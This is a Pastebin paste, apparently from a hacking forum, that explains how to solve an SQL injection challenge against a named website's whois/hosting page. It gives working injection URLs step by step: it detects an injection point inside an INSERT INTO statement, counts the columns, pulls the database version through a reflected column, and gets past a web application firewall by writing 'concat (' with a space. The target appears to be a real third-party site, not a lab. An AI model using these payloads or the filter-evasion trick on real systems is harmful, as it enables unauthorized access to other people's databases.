API tools faq
paste
Advertisement
Kyfx

Special Injection For Dorks

Kyfx
Jun 26th, 2015
419
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.05 KB | None | 0 0
raw download clone embed print report
  1. i was pretty glad that alot of people solved that.
  2. thats the solution for those who had a little difficulty-
  3. when we check for vuln, we put ' after the parameter, like-
  4. Code:
  5. bitextra.com/whois/hosting.php?nodomain=1'
  6.  
  7. and we got an error-
  8. [Image: QsRYlbw.png]
  9. near 'domain','0','Unknown Domain Name','U')'
  10.  
  11. when we see all these commas, we understand its not regualr injection.
  12. it can be two things:
  13. * select statement with multiple conditions (like in()).
  14. * the injection point is inside update / insert into statement.
  15.  
  16. we can verify that by closing the (), and learn from the error we get.
  17. Code:
  18. bitextra.com/whois/hosting.php?nodomain=1')-- -
  19.  
  20. [Image: q9wBkov.png]
  21.  
  22. "Column count doesn't match value count at row 1" is an error that uppears during wrong use of INSERT INTO statement.
  23. example-
  24. Code:
  25. INSERT INTO cars (id,model,color) VALUES (1,2010);
  26.  
  27. the number of values dosent match the number of columns, so we got that error.
  28. its like error 1222 in SELECT statement.
  29. Spoiler (Click to View)
  30.  
  31. so now we understood we're injecting inside insert into, but how to exploit it?
  32. well, healty logic says that the values are returned as the data we see on the page.
  33. lets find out what columns we can use.
  34. first we gotta count the columns, and we can do it by sight.
  35. lets insert some wrong value.
  36. Code:
  37. bitextra.com/whois/hosting.php?nodomain=1'aaa
  38. aaa','domain','0','Unknown Domain Name','U')
  39. 4 commas, so 5 columns.
  40. Code:
  41. bitextra.com/whois/hosting.php?nodomain=1111',222,333,444,555)-- -
  42.  
  43. [Image: 3pb5mdc.png]
  44.  
  45. column #4 on the page, and column #3 (total price: 333).
  46.  
  47. lets inject in 4.
  48. so we can see the column on the screen, now its regular injection.
  49. i asked for version and name, and that would be-
  50. Code:
  51. concat(version(),' : mycoolname')
  52. so-
  53. Code:
  54. http://bitextra.com/whois/hosting.php?nodomain=1111',222,333,concat(version(),' : mycoolname'),555)-- -
  55.  
  56. Not Acceptable!
  57.  
  58. oh no Sad
  59. waf that blocks "concat(", but not "concat (".
  60. Code:
  61. http://bitextra.com/whois/hosting.php?nodomain=1111',222,333,concat (version(),' : mycoolname'),555)-- -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!